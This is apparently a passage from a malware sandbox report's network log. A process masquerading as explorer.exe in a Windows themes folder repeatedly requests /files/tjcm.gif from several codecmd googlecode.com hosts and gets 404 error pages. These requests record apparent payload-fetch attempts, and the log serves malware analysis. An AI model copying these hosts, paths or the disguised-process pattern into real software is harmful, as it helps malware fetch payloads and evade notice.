                                              Sep 30, 2024 16:10:40.845125914 CEST494INData Raw: 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 2d 77 65 62 6b 69 74 2d 6d 69 6e 2d 64 65 76 69 63 65 2d 70 69 78 65 6c 2d 72 61 74 69 6f 3a 32 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f
                                              Data Ascii: only screen and (-webkit-min-device-pixel-ratio:2){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat;-webkit-background-size:100% 100%}}#logo{display:inline-block;height:54px;width:15


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              109192.168.2.651261142.251.173.82806120C:\Windows\Resources\Themes\explorer.exe
                                              TimestampBytes transferredDirectionData
                                              Sep 30, 2024 16:10:41.331274986 CEST215OUTGET /files/tjcm.gif HTTP/1.1
                                              Accept: */*
                                              Accept-Encoding: gzip, deflate
                                              User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like Gecko
                                              Host: codecmd02.googlecode.com
                                              Connection: Keep-Alive
                                              Sep 30, 2024 16:10:42.045516968 CEST1236INHTTP/1.1 404 Not Found
                                              Content-Type: text/html; charset=UTF-8
                                              Referrer-Policy: no-referrer
                                              Content-Length: 1575
                                              Date: Mon, 30 Sep 2024 14:10:41 GMT
                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 [TRUNCATED]
                                              Data Ascii: <!DOCTYPE html><html lang=en> <meta charset=utf-8> <meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"> <title>Error 404 (Not Found)!!1</title> <style> *{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat 0% 0%/100% 100%;-moz-border-image:url(//www.google.com/i [TRUNCATED]
                                              Sep 30, 2024 16:10:42.045547009 CEST494INData Raw: 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 2d 77 65 62 6b 69 74 2d 6d 69 6e 2d 64 65 76 69 63 65 2d 70 69 78 65 6c 2d 72 61 74 69 6f 3a 32 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f
                                              Data Ascii: only screen and (-webkit-min-device-pixel-ratio:2){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat;-webkit-background-size:100% 100%}}#logo{display:inline-block;height:54px;width:15


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              110192.168.2.65126264.233.184.82806120C:\Windows\Resources\Themes\explorer.exe
                                              TimestampBytes transferredDirectionData
                                              Sep 30, 2024 16:10:42.388822079 CEST215OUTGET /files/tjcm.gif HTTP/1.1
                                              Accept: */*
                                              Accept-Encoding: gzip, deflate
                                              User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like Gecko
                                              Host: codecmd03.googlecode.com
                                              Connection: Keep-Alive
                                              Sep 30, 2024 16:10:43.113440037 CEST1236INHTTP/1.1 404 Not Found
                                              Content-Type: text/html; charset=UTF-8
                                              Referrer-Policy: no-referrer
                                              Content-Length: 1575
                                              Date: Mon, 30 Sep 2024 14:10:43 GMT
                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 [TRUNCATED]
                                              Data Ascii: <!DOCTYPE html><html lang=en> <meta charset=utf-8> <meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"> <title>Error 404 (Not Found)!!1</title> <style> *{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat 0% 0%/100% 100%;-moz-border-image:url(//www.google.com/i [TRUNCATED]
                                              Sep 30, 2024 16:10:43.113835096 CEST494INData Raw: 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 2d 77 65 62 6b 69 74 2d 6d 69 6e 2d 64 65 76 69 63 65 2d 70 69 78 65 6c 2d 72 61 74 69 6f 3a 32 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f
                                              Data Ascii: only screen and (-webkit-min-device-pixel-ratio:2){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat;-webkit-background-size:100% 100%}}#logo{display:inline-block;height:54px;width:15


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              111192.168.2.651263173.194.76.82806120C:\Windows\Resources\Themes\explorer.exe
                                              TimestampBytes transferredDirectionData
                                              Sep 30, 2024 16:10:43.538897038 CEST215OUTGET /files/tjcm.gif HTTP/1.1
                                              Accept: */*
                                              Accept-Encoding: gzip, deflate
                                              User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like Gecko
                                              Host: codecmd01.googlecode.com
                                              Connection: Keep-Alive
                                              Sep 30, 2024 16:10:44.226655006 CEST1236INHTTP/1.1 404 Not Found
                                              Content-Type: text/html; charset=UTF-8
                                              Referrer-Policy: no-referrer
                                              Content-Length: 1575
                                              Date: Mon, 30 Sep 2024 14:10:44 GMT
                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 [TRUNCATED]
                                              Data Ascii: <!DOCTYPE html><html lang=en> <meta charset=utf-8> <meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"> <title>Error 404 (Not Found)!!1</title> <style> *{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat 0% 0%/100% 100%;-moz-border-image:url(//www.google.com/i [TRUNCATED]
                                              Sep 30, 2024 16:10:44.226807117 CEST494INData Raw: 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 2d 77 65 62 6b 69 74 2d 6d 69 6e 2d 64 65 76 69 63 65 2d 70 69 78 65 6c 2d 72 61 74 69 6f 3a 32 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f
                                              Data Ascii: only screen and (-webkit-min-device-pixel-ratio:2){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat;-webkit-background-size:100% 100%}}#logo{display:inline-block;height:54px;width:15


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              112192.168.2.651264142.251.173.82806120C:\Windows\Resources\Themes\explorer.exe
                                              TimestampBytes transferredDirectionData
                                              Sep 30, 2024 16:10:44.687026978 CEST215OUTGET /files/tjcm.gif HTTP/1.1
                                              Accept: */*
                                              Accept-Encoding: gzip, deflate
                                              User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like Gecko
                                              Host: codecmd02.googlecode.com
                                              Connection: Keep-Alive
                                              Sep 30, 2024 16:10:45.357692003 CEST1236INHTTP/1.1 404 Not Found
                                              Content-Type: text/html; charset=UTF-8
                                              Referrer-Policy: no-referrer
                                              Content-Length: 1575
                                              Date: Mon, 30 Sep 2024 14:10:45 GMT
                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 [TRUNCATED]
                                              Data Ascii: <!DOCTYPE html><html lang=en> <meta charset=utf-8> <meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"> <title>Error 404 (Not Found)!!1</title> <style> *{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat 0% 0%/100% 100%;-moz-border-image:url(//www.google.com/i [TRUNCATED]
                                              Sep 30, 2024 16:10:45.357717991 CEST494INData Raw: 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 2d 77 65 62 6b 69 74 2d 6d 69 6e 2d 64 65 76 69 63 65 2d 70 69 78 65 6c 2d 72 61 74 69 6f 3a 32 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f
                                              Data Ascii: only screen and (-webkit-min-device-pixel-ratio:2){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat;-webkit-background-size:100% 100%}}#logo{display:inline-block;height:54px;width:15


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              113192.168.2.65126564.233.184.82806120C:\Windows\Resources\Themes\explorer.exe
                                              TimestampBytes transferredDirectionData
                                              Sep 30, 2024 16:10:45.777214050 CEST215OUTGET /files/tjcm.gif HTTP/1.1
                                              Accept: */*
                                              Accept-Encoding: gzip, deflate
                                              User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like Gecko
                                              Host: codecmd03.googlecode.com
                                              Connection: Keep-Alive
                                              Sep 30, 2024 16:10:46.478790998 CEST1236INHTTP/1.1 404 Not Found
                                              Content-Type: text/html; charset=UTF-8
                                              Referrer-Policy: no-referrer
                                              Content-Length: 1575
                                              Date: Mon, 30 Sep 2024 14:10:46 GMT
                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 [TRUNCATED]
                                              Data Ascii: <!DOCTYPE html><html lang=en> <meta charset=utf-8> <meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"> <title>Error 404 (Not Found)!!1</title> <style> *{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat 0% 0%/100% 100%;-moz-border-image:url(//www.google.com/i [TRUNCATED]
                                              Sep 30, 2024 16:10:46.478933096 CEST494INData Raw: 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 2d 77 65 62 6b 69 74 2d 6d 69 6e 2d 64 65 76 69 63 65 2d 70 69 78 65 6c 2d 72 61 74 69 6f 3a 32 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f
                                              Data Ascii: only screen and (-webkit-min-device-pixel-ratio:2){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat;-webkit-background-size:100% 100%}}#logo{display:inline-block;height:54px;width:15


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              114192.168.2.651266173.194.76.82806120C:\Windows\Resources\Themes\explorer.exe
                                              TimestampBytes transferredDirectionData
                                              Sep 30, 2024 16:10:46.876396894 CEST215OUTGET /files/tjcm.gif HTTP/1.1
                                              Accept: */*
                                              Accept-Encoding: gzip, deflate
                                              User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like Gecko
                                              Host: codecmd01.googlecode.com
                                              Connection: Keep-Alive
                                              Sep 30, 2024 16:10:47.559592962 CEST1236INHTTP/1.1 404 Not Found
                                              Content-Type: text/html; charset=UTF-8
                                              Referrer-Policy: no-referrer
                                              Content-Length: 1575
                                              Date: Mon, 30 Sep 2024 14:10:47 GMT
                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 [TRUNCATED]
                                              Data Ascii: <!DOCTYPE html><html lang=en> <meta charset=utf-8> <meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"> <title>Error 404 (Not Found)!!1</title> <style> *{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat 0% 0%/100% 100%;-moz-border-image:url(//www.google.com/i [TRUNCATED]
                                              Sep 30, 2024 16:10:47.559619904 CEST494INData Raw: 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 2d 77 65 62 6b 69 74 2d 6d 69 6e 2d 64 65 76 69 63 65 2d 70 69 78 65 6c 2d 72 61 74 69 6f 3a 32 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f
                                              Data Ascii: only screen and (-webkit-min-device-pixel-ratio:2){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat;-webkit-background-size:100% 100%}}#logo{display:inline-block;height:54px;width:15


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              115192.168.2.651267142.251.173.82806120C:\Windows\Resources\Themes\explorer.exe
                                              TimestampBytes transferredDirectionData
                                              Sep 30, 2024 16:10:47.895481110 CEST215OUTGET /files/tjcm.gif HTTP/1.1
                                              Accept: */*
                                              Accept-Encoding: gzip, deflate
                                              User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like Gecko
                                              Host: codecmd02.googlecode.com
                                              Connection: Keep-Alive
                                              Sep 30, 2024 16:10:48.646862984 CEST1236INHTTP/1.1 404 Not Found
                                              Content-Type: text/html; charset=UTF-8
                                              Referrer-Policy: no-referrer
                                              Content-Length: 1575
                                              Date: Mon, 30 Sep 2024 14:10:48 GMT
                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 [TRUNCATED]
                                              Data Ascii: <!DOCTYPE html><html lang=en> <meta charset=utf-8> <meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"> <title>Error 404 (Not Found)!!1</title> <style> *{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat 0% 0%/100% 100%;-moz-border-image:url(//www.google.com/i [TRUNCATED]
                                              Sep 30, 2024 16:10:48.646886110 CEST494INData Raw: 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 2d 77 65 62 6b 69 74 2d 6d 69 6e 2d 64 65 76 69 63 65 2d 70 69 78 65 6c 2d 72 61 74 69 6f 3a 32 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f
                                              Data Ascii: only screen and (-webkit-min-device-pixel-ratio:2){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat;-webkit-background-size:100% 100%}}#logo{display:inline-block;height:54px;width:15
                                              Sep 30, 2024 16:10:48.646899939 CEST494INData Raw: 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 2d 77 65 62 6b 69 74 2d 6d 69 6e 2d 64 65 76 69 63 65 2d 70 69 78 65 6c 2d 72 61 74 69 6f 3a 32 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f
                                              Data Ascii: only screen and (-webkit-min-device-pixel-ratio:2){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat;-webkit-background-size:100% 100%}}#logo{display:inline-block;height:54px;width:15


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
